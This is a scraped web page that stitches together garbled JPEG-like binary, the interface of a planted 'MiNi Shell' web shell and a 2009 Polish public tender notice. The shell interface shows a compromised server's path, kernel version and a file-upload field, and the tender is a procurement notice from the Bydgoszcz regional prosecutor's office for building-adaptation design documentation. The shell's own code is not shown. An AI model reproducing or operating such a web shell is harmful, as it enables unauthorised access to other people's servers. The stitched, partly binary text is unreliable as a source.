JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090120/6470-N-2009.html

<p class="kh_header"><b>Bydgoszcz: Opracowanie dokumentacji projektowej dotyczącej adaptacji budynku położonego w Bydgoszczy przy ul. Okrzei 10, z przeznaczeniem na siedzibę Prokuratury Okręgowej w Bydgoszczy.</b><br>
<b>Numer ogłoszenia: 6470 - 2009; data zamieszczenia: 20.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Bydgoszczy , ul. Farna 6, 85-101 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3477516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bydgoszcz.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dotyczącej adaptacji budynku położonego w Bydgoszczy przy ul. Okrzei 10, z przeznaczeniem na siedzibę Prokuratury Okręgowej w Bydgoszczy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej dotyczącej adaptacji budynku położonego w Bydgoszczy przy ul. Okrzei 10, z przeznaczeniem na siedzibę Prokuratury Okręgowej w Bydgoszczy na podstawie szczegółowego opisu przedmiotu zamówienia. Przy opracowaniu projektu budowlanego i wykonawczego należy dokonać wizji lokalnej i uwzględnić wytyczne uzupełniające znajdujące się w pkt. 2.1.1 - 2.1.10 SIWZ.  Projekt powinien zawierać wszystkie niezbędne uzgodnienia w celu uzyskania pozwolenia na budowę.

Projekt budowlano -  wykonawczy powinien zawierać : 

Dane ogólne i opis techniczny obiektu - opracowane z uwzględnieniem programu funkcjonalno-użytkowego i wytycznych zawartych w decyzji o warunkach zabudowy, oraz przekazanej dokumentacji budynku.

Inwentaryzację budynku - opracowaną w pierwszym etapie realizacji zadania, na podstawie wizji lokalnej nieruchomości, dokonanych pomiarów oraz na podstawie danych ogólnych.

Koncepcję programowo - przestrzenną - dla planowanych zadań, uwzględniającą funkcje wszystkich pomieszczeń w budynku oraz wszystkich obiektów umiejscowionych na terenie nieruchomości zabudowanej, która jest przedmiotem opracowania. Dopiero tak przygotowana koncepcja, po zatwierdzeniu przez Zamawiającego będzie podstawą do wykonania przedmiotowej dokumentacji projektowej. Koncepcja w trakcie uzgadniania oraz opracowywania może ulegać modyfikacjom do czasu ostatecznego zatwierdzenia jej przez Zamawiającego. Koncepcja powinna być wykonana z uwzględnieniem rozdziału funkcjonalnego pomieszczeń zajmowanych przez Prokuraturę i powinna obejmować: dane ogólne i opis techniczny obiektu, opracowane z uwzględnieniem programu funkcjonalno - użytkowego i wytycznych zawartych w decyzji o warunkach zabudowy. W koncepcji powinien znaleźć się opis zastosowanych rozwiązań technicznych oraz sposobu wykończenia pomieszczeń i zastosowanych materiałów. 

Projekt zagospodarowania - z uwzględnieniem całości potrzebnej infrastruktury opracowany na bazie aktualnego (uzyskanego przez Wykonawcę) podkładu geodezyjnego do celów projektowania i decyzji o warunkach zabudowy oraz uwzględniający rozeznanie (dokonane przez Wykonawcę) w zakresie warunków technicznych podłączenia mediów,

Szkice - rozwiązań funkcjonalnych poszczególnych kondygnacji i szkice jego elewacji,

Dokumentację - ustalającą geotechniczne warunki posadowienia obiektu,

Dokumentację projektową - projekty budowlane wykonane na podstawie zatwierdzonej koncepcji z uwzględnieniem ewentualnie zawartych w niej warunków dodatkowych, opracowane w stopniu szczegółowości zgodnym z wymaganiami określonymi w art. 34 ustawy z dnia 7 lipca 1994 roku Prawo Budowlane ( Dz. U. z 2006 r., nr 156, poz. 1184 z późn. zm.) i rozporządzeniem Ministra Infrastruktury  z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. z 2003 r., nr 120, poz. 1133 z późn. zm.)wraz z uzyskaniem w imieniu inwestora pozwolenia na budowę, a także:
ewentualne projekty branżowe, jakie mogą być wymagane przez jednostki zobowiązane do uzgodnienia projektu budowlanego,
zbiorcze zestawienie kosztów remontu, obejmujące fazę przygotowania, realizacji, zakupów wyposażenia i wszystkich pozostałych kosztów,
harmonogram ogólny realizacji i harmonogram finansowania.
a)	Projekty wykonawcze opracowane  będą na podstawie zatwierdzonego w zgłoszeniu lub pozwoleniu na budowę projektu budowlanego i obejmą wszystkie niezbędne dla wykonawstwa elementy dokumentacji tj.:
projekt techniczny architektury zewnętrznej i wewnętrznej wraz ze wszystkimi potrzebnymi do wykonawstwa detalami,
projekt techniczny konstrukcji i umiejscowienia windy wraz z ewentualnie potrzebnymi rysunkami warsztatowymi,
projekt sieci zewnętrznych i przyłączy z uzgodnieniami zapewniającymi dostawy mediów do obiektu (jeśli będzie konieczny),
projekty techniczne poszczególnych instalacji wewnętrznych jeśli będą one wymagały wymiany lub zmiany położenia, tj. m.in.: elektroenergetycznej, wentylacji, wodnej, kanalizacyjnej, grzewczej, 
projekt wyjść ewakuacyjnych zgodnie z obowiązującymi w tym zakresie przepisami, 
projekt parkingu i ogrodzenia terenu,
projekt zieleni i form małej architektury,
projekt aranżacji wnętrz, 
przedmiary robót z podziałem na etapy realizacji,
kosztorys inwestorski, z podziałem na etapy realizacji,
ewentualnie potrzebne projekty specjalistyczne.
b)	Specyfikację techniczną wykonania i odbioru robót budowlanych dla poszczególnych zadań obejmującą zbiór wymagań w zakresie sposobu prawidłowego wykonania i odbioru robót budowlanych będących przedmiotem zamówienia, wymagania w zakresie właściwości zaprojektowanych materiałów itd..

Dokumentacja projektowa powinna być przygotowana w taki sposób, aby umożliwić podział zadania na etapy, z jednoczesną możliwością korzystania ze wszystkich instalacji wewnętrznych i zewnętrznych, w wyznaczonych rejonach budynku, gdzie nie będzie prowadzony remont. Etapowość powinna uwzględniać aktualny podział budynku na dwie zasadnicze części: biurową i mieszkalną oraz podział na kondygnacje. Projekt i zaplanowana sekwencja prac remontowych powinna wyróżniać następujące obszary do wykonania w określonej kolejności:
1. remont głównej klatki schodowej części biurowej i dostosowanie jej do wymogów ppoż i BHP, wraz z projektem organizacji tych robót,
2. odświeżenie pomieszczeń III i IV piętra (jeśli będzie to konieczne), 
3. remont pomieszczeń na kondygnacjach od parteru do II pietra części biurowej budynku, wraz z projektem organizacji tych robót,
4. wymiana stolarki okiennej i drzwiowej oraz remont wnętrza części mieszkalnej budynku, 
5. integracja części mieszkalnej z pozostałą częścią budynku, 
6. wykonanie windy, 
7. wykonanie ocieplenia i elewacji budynku, 
8. zagospodarowanie parkingu i ogrodzenie terenu. 

Założenia i wymagania
Adaptacja budynku na potrzeby Prokuratury wymagała będzie przeprowadzenia remontu pomieszczeń biurowych w celu dostosowania ich do określonych wymagań i standardu. Istotnym założeniem dla Wykonawcy projektu jest takie zaplanowanie prac by było możliwe zminimalizowanie prac związanych z wyburzaniem lub przenoszeniem ścian działowych i otworów wejściowych.
Zamawiający wymaga również by projekt uwzględniał zachowanie dotychczasowej infrastruktury energetycznej, wodno - kanalizacyjnej i centralnego ogrzewania chyba, że na etapie inwentaryzacji zostanie zaakcentowana konieczność wymiany jej fragmentów bądź całości.
Budynek posiada w części wykonaną instalację okablowania strukturalnego, ppoż, antywłamaniową oraz CCTV oraz dokumentację projektową na wykonanie wymienionych instalacji w całości budynku. Należy tak zaplanować prace remontowe by nie uległy uszkodzeniu bądź naruszeniu istniejące trakty kablowe wymienionych sieci. 
Streszczenie wymagań dotyczących opracowywanej dokumentacji:

	Przedmiary robót należy opracować z podziałem na poszczególne: zadania, branże i części obiektu w sposób szczegółowy, tzn. w pozycjach należy umieścić wszystkie składowe obliczeń, ilości poszczególnych robót w rozbiciu na pomieszczenia, kondygnacje i części.

	Kosztorysy inwestorskie należy opracować z podziałem na poszczególne zadania, branże, kondygnacje i części obiektu.

	W ofercie należy przewidzieć również nakłady na uzyskanie potrzebnych do projektowania planów, pozwolenia na budowę, warunków technicznych, uzgodnień budowlanych, oraz wszystkich innych dokumentów wymaganych na mocy przepisów szczególnych. 

Wykonawca w przekazanej dokumentacji umieszcza harmonogram prac remontowych z podziałem na etapy i określa orientacyjny czas ich wykonania, wskazuje również etapy prac,  na które wymagane będzie uzyskanie pozwolenia na budowę.

Aby uzyskać efekt końcowy, który spełniałby pełne oczekiwania Zamawiającego, Wykonawca musi być w ciągłym kontakcie z Zamawiającym. Konsultacje i uzgodnienia co do opracowania koncepcji modernizacji i adaptacji budynku muszą odbywać się u Zamawiającego przynajmniej raz w tygodniu, a w razie konieczności częściej. Na spotkaniach omawiany będzie zakres oraz stan zaawansowania prac, zakres zmian i modyfikacji.

Projekty oraz pozostała dokumentacja muszą zostać omówione z  Zamawiającym i zaakceptowane przed protokolarnym odbiorem. Projekty muszą uwzględnić wymagania jakie stawia się tego typu budynkom użyteczności publicznej, zgodnie z wytycznymi Ministerstwa Sprawiedliwości, jak również w zakresie dostosowania do potrzeb osób niepełnosprawnych na poziomie parteru obiektu, tj. likwidacja barier architektonicznych, podjazdy, przystosowane ubikacje. Dokładny zakres przystosowania budynków dla potrzeb osób niepełnosprawnych zostanie uzgodniony w czasie opracowywania dokumentacji.

Zamawiający posiada program funkcjonalno - użytkowy. Program ten należy dostosować do istniejących warunków i uwzględnić przy opracowywaniu dokumentacji.

Przedmiary robót, dokumentację oraz kosztorysy Wykonawca dostarcza Zamawiającemu w formie papierowej i na płycie CD w formie elektronicznej.

Dokumentacja techniczna powinna być sporządzona w 5 egzemplarzach, oraz w wersji elektronicznej.

Ogólny opis zakresu prac remontowych, adaptacyjnych i modernizacyjnych

Kompleksowa modernizacja i adaptacja istniejącego budynku obejmuje m. in.:
wykonanie wymiany zużytych elementów drewnianych,
wykonanie nowego pokrycia dachu (jeśli będzie to konieczne) i wykończeń blacharskich,
wymianę zużytej i uszkodzonej stolarki okiennej i drzwiowej,
remont głównej klatki schodowej i dostosowanie jej do wymogów ppoż,
remont pomieszczeń biurowych,
remont pomieszczeń mieszkalnych i ich adaptacja do celów biurowych,
wykonanie prac wykończeniowych posadzek i ścian,
wykonanie pozostałej części sieci logicznej i pozostałych sieci instalacji niskoprądowych,
częściową wymianę instalacji elektrycznej i sanitarnej,
wykonanie windy,
ocieplenie ścian zewnętrznych i wykonanie elewacji budynku, 
w razie konieczności izolacja fundamentów,
projekt zagospodarowania terenu z projektem budowlano - wykonawczym dróg i parkingów, 
ogrodzenie terenu.


Projektant zapewnia nadzór autorski, obejmujący następujące obszary:
1. remont głównej klatki schodowej części biurowej i dostosowanie jej do wymogów ppoż i BHP, 
2. odświeżenie pomieszczeń III i IV piętra (jeśli będzie to konieczne), 
3. remont pomieszczeń na kondygnacjach od parteru do II pietra części biurowej budynku, 
4. wymiana stolarki okiennej i drzwiowej oraz remont wnętrza części mieszkalnej budynku, 
5. integracja części mieszkalnej z pozostałą częścią budynku, 
6. wykonanie windy, 
7. wykonanie ocieplenia i elewacji budynku, 
8. zagospodarowanie parkingu i ogrodzenie terenu,
przy czym, nadzór dla poszczególnego obszaru obejmuje nie więcej niż dwa spotkania robocze..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy: 

posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  
posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, a także osobami zdolnymi do wykonania Zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia,
nie podlegają wykluczeniu z Postępowania, zgodnie z art. 24 Ustawy.   

Zamawiający ustala następujące szczegółowe warunki udziału w Postępowaniu:
W zakresie warunku wskazanego w punkcie 4.1.2 SIWZ wymagane jest posiadanie 
niezbędnej wiedzy i doświadczenia w zakresie określonym w opisie  
przedmiotu zamówienia. Ocena spełnienia warunku nastąpi na podstawie  
przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których  
mowa w punkcie 5.1.1. SIWZ
W zakresie warunku wskazanego w punkcie 4.1.3 SIWZ ocena spełnienia  
warunków szczegółowych nastąpi na podstawie przedstawionych przez  
Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 5.1.2. SIWZ
W zakresie warunków wskazanych w punkcie 4.1.1 i 4.1.4 SIWZ ocena spełnienia   
warunków szczegółowych nastąpi na podstawie przedstawionych przez  
Wykonawcę dokumentów, o których mowa w punkcie 5.1.3. SIWZ.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> OŚWIADCZENIA I DOKUMENTY JAKIE POWINNI DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW OKREŚLONYCH W PUNKCIE 4 SIWZ
W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
Warunki szczegółowe określone w punkcie 4.2.1 SIWZ - wraz z ofertą każdy z Wykonawców powinien złożyć:
a. oświadczenie, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym, a także osobami zdolnymi do wykonania Zamówienia lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - załącznik nr 1 do SIWZ,
b.  wykaz wykonanych w okresie ostatnich trzech lat usług, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie - załącznik nr 6 do SIWZ,
Warunki szczegółowe określone w punkcie 4.2.2 SIWZ - wraz z ofertą każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. Jednocześnie do oferty należy załączyć:
-	polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie wykonywanej działalności gospodarczej z dowodem zapłaty składki z tytułu zawarcia umowy ubezpieczenia, w okresie trwania umowy, zarówno ubezpieczenia parkingu jak i pojazdów.
Warunki szczegółowe określone w punkcie 4.2.3 SIWZ - do ofert każdy z Wykonawców powinien załączyć:
-	 aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-	 aktualne informacje z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-	 aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; (dotyczy podmiotów zbiorowych w rozumieniu art. 2 ustawy z dnia 28.10.2002 r. o odpowiedzialności podmiotów zbiorowych Dz. U. z 2002 r., nr 197, poz. 1661 z późn. zm.),
-	  zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert;
-	  zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bydgoszcz.po.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> przetargi@bydgoszcz.po.gov.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2009 godzina 11:00, miejsce: Prokuratura Okręgowa w Bydgoszczy, ul. Farna 6, 85 - 101 Bydgoszcz, pokój 303.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com